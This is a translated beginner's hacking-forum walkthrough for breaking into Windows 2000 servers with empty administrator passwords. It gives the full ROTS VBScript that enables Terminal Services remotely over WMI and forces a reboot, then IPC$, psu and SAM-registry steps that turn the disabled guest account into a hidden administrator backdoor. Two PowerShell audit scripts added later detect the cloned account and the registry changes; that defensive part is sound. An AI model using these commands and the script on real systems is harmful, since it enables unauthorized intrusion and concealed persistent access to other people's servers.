A simple 3389 intrusion walkthrough
Original author: caozhe (草哲)
Source: 中国欲网技术论坛 -- 草哲

I've seen lots and lots of articles online teaching you how to intrude this way or that, and I think newbies can't understand them at all!
So I had an idea: write something simpler, suited to newbies, and share what I've learned with everyone!
To do an intrusion, I suggest you work from a Win2000 environment!

First of all, to intrude you need tools! Let me recommend a few programs; they are the ones I've always used:
For scanning: X-Scan V2.3, WINNTAutoAttack, and 流光 (Fluxay)!
I rarely use X-Scan these days; I mostly use WINNTAutoAttack, and of course I also use 小榕's 流光 a lot!
Opening Terminal Services remotely only needs one script; the code is in the second post (it is reproduced at the end of this page). Save it as *.vbe (I saved mine as rots.vbe).
For cloning an account, psu is all you need!

OK, suppose the scan turned up a server with a weak NT password: IP address 120.0.0.1, administrator account administrator, empty password.
Run CMD (the DOS prompt under 2000) and we'll open Terminal Services on it!
The command is as follows:
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
The command above should be easy to follow: cscript rots.vbe is the command; after it come the IP, then the administrator account, then the password (the administrator password on 120.0.0.1 is empty, so the empty string is written as a pair of double quotes), then the port (you can set the terminal port to whatever you like), and finally /fr, the reboot switch (forced reboot; I generally use this one; you can also use /r, a normal reboot).
Because Terminal Server only exists on Win2000 Server and above (Server included), Pro naturally won't work; this version of the script checks the server's edition and, if it is Pro, prompts you to quit the setup!
If all goes well, you'll be able to connect to the terminal in a little while. We can ping it to see whether it has rebooted: ping 120.0.0.1 -t
After the installation, connect to the terminal with a connection client! Now let's clone an account, heh, to make things convenient later on!
Back to DOS! We set up an IPC$ connection:
net use \\120.0.0.1\ipc$ "" /user:"administrator"
I think this command should be self-explanatory. When it completes, we upload psu to the target's winnt\system32 directory:
copy psu.exe \\120.0.0.1\admin$\system32
When the upload is done, start building the backdoor account on the compromised box (the "肉鸡")! Over to the box!

Suppose the guest user is disabled; guest is exactly what we'll use as the backdoor account!
On that server, run CMD and enter at the command line:
psu -p regedit -i PID
A quick explanation: the PID at the end is the process ID of the system process winlogon. Right-click the taskbar and open Task Manager!
On the Processes tab, find the winlogon process; the number next to it is winlogon's PID. Suppose it is 5458.
Then the command is:
psu -p regedit -i 5458
This launches the Registry Editor directly with winlogon's privileges, so the local SAM information can be read.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Under it is the local user information! What we want to do is clone the disabled guest into an account with administrator privileges!
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
Look at administrator's type: it is 1f4; now look at guest's: it is 1f5.
OK, now that you know the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
In this key, double-click the F value on the right, copy the jumble of characters inside, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and double-click the F value on the right, and paste what you just copied into it!

Once that is done, export the two keys HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
After exporting, delete those two keys, then import them back in! Close the Registry Editor.

Open CMD and enter at the command line:
net user guest password
This command sets a password for guest; the trailing password is the password.
Then enter:
net user guest /active:y
This command activates the guest account; then we disable it again:
net user guest /active:n
The three commands above must be run from DOS!

Done! Open Computer Management and look at Users: see, the guest account still shows as disabled! Haha, but it already has administrator privileges!
And it doesn't show in the Administrators group, yet it can log on to the terminal, just like the administrator account!

Log off and log on as guest!

I'm worn out from typing! It really wasn't easy, heh. I hope everyone can understand the above!
If there's still anything you don't understand, you can ask me; whatever I know I'll be sure to tell you all!

Since I'm a newbie myself, I got a bit carried away once I learned a little, heh! If anything is wrong, I hope the experts will point it out!

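A defender's counterpart to the cloning steps above, added here as an example that is not part of the original post or of the author's tools. In every account key under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users, the F value stores the account's own RID as a little-endian DWORD at offset 0x30 and the account-control flags as a WORD at offset 0x38 (bit 0x0001 = disabled); the V value stores the user name, with its offset (relative to 0xCC) and byte length at 0x0C and 0x10 (the layout documented by chntpw's user_F and user_V structures). Copying administrator's F into 000001F5 leaves a Guest key whose stored RID reads 0x1F4, so this PowerShell function flags any key whose name and stored RID disagree. It has to run in a SYSTEM context (for example a scheduled task running as SYSTEM), because the SAM hive is not readable by Administrators by default; the function names are invented for this example.

```powershell
# Added audit example; not part of the original post or the author's tools.
# Must run in a SYSTEM context: HKLM\SAM is not readable by Administrators by default.
# Offsets are those of the SAM user record (chntpw's user_F / user_V):
#   F: RID as little-endian DWORD at 0x30, account-control WORD at 0x38 (bit 0x0001 = disabled)
#   V: user-name offset (relative to 0xCC) at 0x0C, byte length at 0x10, UTF-16LE data

function Read-SamUserName {
    param([byte[]]$V)
    if ($null -eq $V -or $V.Length -lt 0x14) { return '<no V>' }
    $ofs = [BitConverter]::ToInt32($V, 0x0C) + 0xCC
    $len = [BitConverter]::ToInt32($V, 0x10)
    if ($len -le 0 -or ($ofs + $len) -gt $V.Length) { return '<unparsable>' }
    [System.Text.Encoding]::Unicode.GetString($V, $ofs, $len)
}

function Find-ClonedSamAccount {
    param([string]$UsersKey = 'HKLM:\SAM\SAM\Domains\Account\Users')

    foreach ($key in Get-ChildItem -Path $UsersKey) {
        # Account keys are named by RID in 8 hex digits (000001F4 = 500 = administrator); skip "Names".
        if ($key.PSChildName -notmatch '^[0-9A-Fa-f]{8}$') { continue }
        $f = $key.GetValue('F')
        if ($null -eq $f -or $f.Length -lt 0x3A) { continue }
        $v = $key.GetValue('V')

        $keyRid    = [Convert]::ToUInt32($key.PSChildName, 16)
        $storedRid = [BitConverter]::ToUInt32($f, 0x30)
        $acb       = [BitConverter]::ToUInt16($f, 0x38)

        [pscustomobject]@{
            Name      = Read-SamUserName -V $v
            KeyRid    = $keyRid
            StoredRid = $storedRid
            Disabled  = ($acb -band 0x0001) -ne 0
            Cloned    = $keyRid -ne $storedRid   # the trace left by copying another account's F
        }
    }
}

Find-ClonedSamAccount | Format-Table -AutoSize
```

On a clean host every row has KeyRid equal to StoredRid. The Disabled column is deliberately not used as the verdict: the post's final `net user guest /active:n` step leaves the cloned account disabled on purpose, which is exactly why Computer Management shows nothing unusual.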
----------------------------------------------------------------------
Below is the script for opening Terminal Services; save it as *.vbe

on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' If launched under wscript.exe (double-click), relaunch under cscript so console I/O works
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    set objShell=wscript.createObject("wscript.shell")
    objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
    wscript.quit
end if
if wscript.arguments.count<3 then
    usage()
    wscript.echo "Not enough parameters."
    wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
    port=wscript.arguments(3)
else
    port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
    wscript.echo "The number of port is error."
    wscript.quit
end if
if wscript.arguments.count>4 then
    reboot=wscript.arguments(4)
else
    reboot=""
end if

usage()
outstreem.write "Connecting "&ipaddress&" ...."
' Connect to the target's WMI service with the supplied credentials
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
    if instr(objinstoscaption.caption,"Server")>0 then
        wscript.echo "OK!"
    else
        wscript.echo "OS type is "&objinstoscaption.caption
        outstreem.write "Do you want to cancel setup?[y/n]"
        strcancel=instreem.readline
        if lcase(strcancel)<>"n" then wscript.quit
    end if
next

outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
    .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
    .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
    .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
    .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
    .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
    outstreem.write "Now, reboot target...."
    strwqlquery="select * from win32_operatingsystem where primary='true'"
    set colinstances=objswbemservices.execquery(strwqlquery)
    for each objinstance in colinstances
        objinstance.win32shutdown(flag)
    next
    showerror(err.number)
else
    wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)
    if errornumber Then
        wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
        if err.description <> "" then
            wscript.echo "Error description: "&err.description&"."
        end if
        wscript.quit
    else
        wscript.echo "OK!"
    end if
end function

function usage()
    wscript.echo string(79,"*")
    wscript.echo "ROTS v1.05"
    wscript.echo "Remote Open Terminal services Script, by 草哲"
    wscript.echo "Welcome to visit www.5458.net"
    wscript.echo "Usage:"
    wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
    wscript.echo "port: default number is 3389."
    wscript.echo "/r: auto reboot target."
    wscript.echo "/fr: auto force reboot target."
    wscript.echo string(79,"*")&vbcrlf
end function
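The registry writes in the script above are also its footprint. The following PowerShell audit, an added example that is not part of the original post or of ROTS, reads back each value the script sets and reports whether the current data matches what the script leaves behind; it also flags an RDP-Tcp PortNumber that differs from the baseline, since the script sets whatever port the caller chose. The fDenyTSConnections entry is not written by the script: it is the value that replaced TSEnabled on XP and later (0 = remote connections allowed), listed so the check stays meaningful on newer systems. Run it locally with administrative rights; the function name and the $ExpectedRdpPort parameter are invented for this example.

```powershell
# Added audit example; not part of the original post or of the ROTS script.
# Run locally with administrative rights. Each entry is a value rots.vbe writes,
# with the data the script leaves behind ("Tampered"). fDenyTSConnections is the
# XP-and-later replacement for TSEnabled and is listed for newer systems only;
# rots.vbe itself never touches it.

$RotsFootprint = @(
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache';  Name = 'Enabled';            Tampered = 0   },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer';      Name = 'EnableAdminTSRemote'; Tampered = 1   },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server';   Name = 'TSEnabled';          Tampered = 1   },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server';   Name = 'fDenyTSConnections'; Tampered = 0   },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\TermDD';           Name = 'Start';              Tampered = 2   },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService';      Name = 'Start';              Tampered = 2   },
    @{ Path = 'Registry::HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle';     Name = 'Hotkey';             Tampered = '1' }
)

function Get-RotsFootprint {
    param([int]$ExpectedRdpPort = 3389)   # this host's intended RDP port; invented parameter

    foreach ($item in $RotsFootprint) {
        $key = Get-Item -Path $item.Path -ErrorAction SilentlyContinue
        $current = if ($key) { $key.GetValue($item.Name) } else { $null }
        [pscustomobject]@{
            Path    = $item.Path
            Name    = $item.Name
            Current = $current
            Flag    = ($null -ne $current) -and ("$current" -eq "$($item.Tampered)")
            Note    = 'matches the data rots.vbe writes'
        }
    }

    # The listener port is whatever the caller passed to rots.vbe, so flag any deviation from the baseline.
    $rdpKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $rdp  = Get-Item -Path $rdpKey -ErrorAction SilentlyContinue
    $port = if ($rdp) { $rdp.GetValue('PortNumber') } else { $null }
    [pscustomobject]@{
        Path    = $rdpKey
        Name    = 'PortNumber'
        Current = $port
        Flag    = ($null -ne $port) -and ([int]$port -ne $ExpectedRdpPort)
        Note    = "differs from baseline port $ExpectedRdpPort"
    }
}

$report = Get-RotsFootprint
$report | Format-Table -AutoSize
"Flagged values: $(@($report | Where-Object Flag).Count) of $($report.Count)"
```

TermService set to auto-start (Start = 2) and TSEnabled = 1 are normal wherever Terminal Services are meant to be on, so a flag is a prompt to compare against the host's intended configuration rather than proof of compromise; the strongest single signal is a PortNumber that nobody changed on purpose, since the script is the only thing in this post that touches it.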
Reposted from 安全焦点 (xfocus)